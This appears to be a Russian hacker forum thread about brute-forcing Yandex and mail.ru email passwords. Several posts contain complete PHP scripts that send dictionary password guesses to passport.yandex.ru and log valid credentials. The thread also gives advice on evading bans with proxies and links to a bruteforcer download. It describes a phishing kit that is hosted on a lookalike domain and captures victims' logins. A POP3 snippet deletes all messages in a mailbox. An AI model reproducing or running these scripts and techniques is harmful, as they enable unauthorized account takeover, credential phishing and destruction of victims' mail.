Подскажите актуален ли сейчас брут почты @yandex.ru? Какие там ограничения? Банят?

юзай брут от Whack`a

попробуй сам вручную перебрать 5 паролей, а потом задавай глупые вопросы, через pop3 банят после 300 попыток

да, банят быстро и на долго.
или запасайся пачкой прокси, или забей...

да актуален

если хочеш заюзай мой скрипт (нужны сокеты)

для брута одного логина несколькими паролями


<?php
$login="логинжертвы";

$passfile = "pass.txt";
for ($doscriot=0;$doscriot<=count($contents);$doscriot++)
{
$passfile = "pass.txt";

$handle = fopen($passfile,"r");
$contents = fread($handle,filesize($passfile));
fclose($handle);
$contents = explode("\n",$contents);
$parol=trim($contents[$doscriot]);


$hostname = "passport.yandex.ru";
$path = "/passport";
$line = "";


$fp = fsockopen($hostname, 80, $errno, $errstr, 30);

if (!$fp) echo "$errstr ($errno)<br />\n";
else
{

$data = "mode=auth&login=".$login."&passwd=".$parol."&retpath=http://mail.yandex.ru\r\n\r\n";

$headers = "POST $path HTTP/1.1\r\n";
$headers .= "Host: $hostname\r\n";
$headers .= "Content-type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: ".strlen($data)."\r\n\r\n";

fwrite($fp, $headers.$data);
while (!feof($fp))
{
$line .= fgets($fp, 1024);
}
fclose($fp);
}

if($line[9]=="3")
{

$zergood = 'good.txt';
$somecontent = " для логина ".$login." пароль ".$parol;


if (is_writable($zergood)) {


if (!$udacha = fopen($zergood, 'a')) {
echo "Не могу открыть файл ($zergood)";
exit;
}


if (fwrite($udacha, $somecontent) === FALSE) {
echo "Не могу произвести запись в файл ($zergood)";
exit;
}

echo "Ура! сбручено ($somecontent) и записано в файл ($zergood)";

fclose($udacha);

} else {
echo "Файл $zergood недоступен для записи";
}

}

}


?>
создаём ещё файлы good.txt куда запишется удачная комбинация

и файл pass.txt со словарём для брута (список паролей)
на все файлы права 777


для брута одним паролем на несколько логинов
<?php
$parol="пароль";

$loginsfile = "login.txt";
for ($doscriot=0;$doscriot<=count($contents);$doscriot++)
{
$loginsfile = "login.txt";

$handle = fopen($loginsfile,"r");
$contents = fread($handle,filesize($loginsfile));
fclose($handle);
$contents = explode("\n",$contents);
$loginsss=trim($contents[$doscriot]);


$hostname = "passport.yandex.ru";
$path = "/passport";
$line = "";


$fp = fsockopen($hostname, 80, $errno, $errstr, 30);

if (!$fp) echo "$errstr ($errno)<br />\n";
else
{

$data = "mode=auth&login=".$loginsss."&passwd=".$parol."&retpath=http://mail.yandex.ru\r\n\r\n";

$headers = "POST $path HTTP/1.1\r\n";
$headers .= "Host: $hostname\r\n";
$headers .= "Content-type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: ".strlen($data)."\r\n\r\n";

fwrite($fp, $headers.$data);
while (!feof($fp))
{
$line .= fgets($fp, 1024);
}
fclose($fp);
}

if($line[9]=="3")
{

$zergood = 'good.txt';
$somecontent = " у пароля ".$parol." логин ".$loginsss;


if (is_writable($zergood)) {


if (!$udacha = fopen($zergood, 'a')) {
echo "Не могу открыть файл ($zergood)";
exit;
}


if (fwrite($udacha, $somecontent) === FALSE) {
echo "Не могу произвести запись в файл ($zergood)";
exit;
}

echo "Ура! сбручено ($somecontent) и записано в файл ($zergood)";

fclose($udacha);

} else {
echo "Файл $zergood недоступен для записи";
}

}

}


?>


создаём ещё файлы good.txt куда запишется удачные комбинации

и файл login.txt со словарём для брута (список логинов)
на все файлы права 777

Хороший скрипт)

Хм. У меня в Брутусе скорость от 700pps на яндексе. Правда бан потом идет, но словарик 3000-5000 паролей отлично проходит. Меня кончно немного поражает скорость такая, но пароль все равно находится валидный.

Хороший скрипт)
а главное что свой трафик тратить ненужно. залил на сайт запустил скрипт выключил комп лёг спать и твой домен всё за тебя сделает. а на завтро смотриш на сайте уже удачные комбинации. помоему рализация брутеров на пхп стоящее занятие

Надо будит испытать как ты сказал + тебе в репу)

ТС , ДА актуалеен!

а мложно тупой вопрос? а скрипт куда вставлять? как я понял страница сохраняется в index.php а вот начало такого <html><body> тут скрипт php и потом идут закрывающие тэги! или не так???

а мложно тупой вопрос? а скрипт куда вставлять? как я понял страница сохраняется в index.php а вот начало такого <html><body> тут скрипт php и потом идут закрывающие тэги! или не так???

Копируещ весь код из первого поста и сохраняеш в файлик index.php (создай текстовый документ и переименуй txt на php) :)

И без всяких <html><body> и т.п.

Zet36, респект за скрипт. +)

нашел у себя старый брютер для яндекса.

http://img293.imageshack.us/img293/9370/scrbf4.th.jpg (http://img293.imageshack.us/my.php?image=scrbf4.jpg)

скачать можно ЗДЕСЬ (http://slil.ru/25733003)
пас 123

А в чем проблема с использованием aet2 в связке с прокси?

если прокси есть конечно актуален

скажите какой брут юзать если мне надо сбрутить платёжный пароль на _money.yandex.ru

короч пробовал брютить как советовал ZET36... долго получается. вспомнился старый прикол с яндексом (да и для других почт сервисов были заготовки)
смотрим ЗДЕСЬ (http://slil.ru/25790662)
короч вливаем на хост все файлы, кидаем юзверю ссыль на passport.htm и проверяем файлик base.txt (сюда сохраняются введенные логины и пасы)
ИМХО: катит) мне с первого раза удалось заставить юзверя кликнуть ссыль yandex.ЛЮБОЙ-ХОСТ.com/passport.htm , которую послал с мыльника супер-пупер-админ@ya.ru
удачи)
+)
___________________
да, XaCeRoC мож переделать дизайн и под маней)

NetSter а какой там pass?

упс )) забыл
пасс 123

рекомендую брутить яндекс brutus-aet2 очень хорошая прога!

рекомендую брутить яндекс brutus-aet2 очень хорошая прога!
уже на протяжении 5 последних лет :)

а приватные брутеры есть у кого нить?

а приватные брутеры есть у кого нить?есть....

есть....
продашь?)

NetSter
ничего не остается в base.txt
может там права файлам, котрый на хост заливаешь надо выставлять?

Клевая штука.
Этот скрипт соответственно будет работать с моего домена, значит вариант с прокси здесь отпадает??? Нельзя допустим его направить не напрямую на яндекс а через прокси???

Копируещ весь код из первого поста и сохраняеш в файлик index.php (создай текстовый документ и переименуй txt на php) :)

И без всяких <html><body> и т.п.

вот не много изменил твой брут




<?php
$login="akula@mail.ru";

$passfile = "pass.txt";
for ($doscriot=0;$doscriot<=count($contents);$doscriot++)
{
$passfile = "pass.txt";

$handle = fopen($passfile,"r");
$contents = fread($handle,filesize($passfile));
fclose($handle);
$contents = explode("\n",$contents);
$parol=trim($contents[$doscriot]);


$hostname = "passport.mail.ru";
$path = "/passport";
$line = "";


$fp = fsockopen("udp://127.0.0.1", 21, $errno, $errstr);
if (!$fp) {
echo "ERROR: $errno - $errstr<br />\n";
} else {
fwrite($fp, "\n");
echo fread($fp, 26);

}
}
$data = "mode=auth&login=".$login."&passwd=".$parol."&retpath=http://www.mail.ru\r\n\r\n";

$headers = "POST $path HTTP/1.1\r\n";
$headers .= "Host: $hostname\r\n";
$headers .= "Content-type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: ".strlen($data)."\r\n\r\n";

fwrite($fp, $headers.$data);
while (!feof($fp))
{
$line .= fgets($fp, 1024);
}
fclose($fp);

if($line[9]=="3")
{

$zergood = 'good.txt';
$somecontent = " для логина ".$login." пароль ".$parol;


if (is_writable($zergood)) {


if (!$udacha = fopen($zergood, 'a')) {
echo "Не могу открыть файл ($zergood)";
exit;
}


if (fwrite($udacha, $somecontent) === FALSE) {
echo "Не могу произвести запись в файл ($zergood)";
exit;
}

echo "сбручено ($somecontent) и записано в файл ($zergood)";

fclose($udacha);

} else {
echo "Файл $zergood недоступен для записи";
}
}
?>





.................................................. .......................................
вставил это
$fp = fsockopen("udp://127.0.0.1", 13, $errno, $errstr);
if (!$fp) {
echo "ERROR: $errno - $errstr<br />\n";
} else {
fwrite($fp, "\n");
echo fread($fp, 26);
fclose($fp);

.................................................. ..........................
убрал это

$fp = fsockopen($hostname, 80, $errno, $errstr, 30);

if (!$fp) echo "$errstr ($errno)<br />\n";
else
{
.................................................. ............................
вот хотел спросить строку если тут изменить udp://127.0.0.1

<?php
// So, username is your POP3 $username, password is your $password

$cmd = array();
$cmd[] = "USER $username\r\n";
$cmd[] = "PASS $password\r\n";
$cmd[] = "STAT\r\n";
$cmd[] = "QUIT\r\n";

// Server is your POP3 server, ie pop3.server.com
// Port is the port number ( should be 110 )

$port = 110;

$fp = fsockopen($server, $port);
if(!$fp)
{
print("Error connecting to server $server");
}
else
{
$ret = fgets($fp, 1024);
foreach($cmd as $ret)
{
fputs($fp,$ret);
$line = fgets($fp, 1024);
print($line."<br>");
if($ret=="STAT\r\n")
{
$fields = explode(" ",$line);
$num_mails = $fields[1];
for($i=1;$i<=$num_mails;$i++)
{
fputs($fp,"DELE $i\r\n");
$line = fgets($fp, 1024);
}
}
}
}
?>
так наверно будет красивей,,,,
а дальше можете сами вписатть pass.txt and good.txt

Что за приватные брутеры?

Что за приватные брутеры?
Платные или скрытые для простых юзеров )
ps:они не для тебя :D

Платные или скрытые для простых юзеров )
ps:они не для тебя :D


Нуу я бы так не сказал, просто иногда проблема не в том что они платные, а в том что не знаешь кому платить.

Платные или скрытые для простых юзеров )
ps:они не для тебя :D
может для негО? откуда знаешь?
Нуу я бы так не сказал, просто иногда проблема не в том что они платные, а в том что не знаешь кому платить.
^^

sa~ да я бы купил, если работает нормально)

может для негО? откуда знаешь?

Раз спрашивает чё ето такое то точно не для него ;)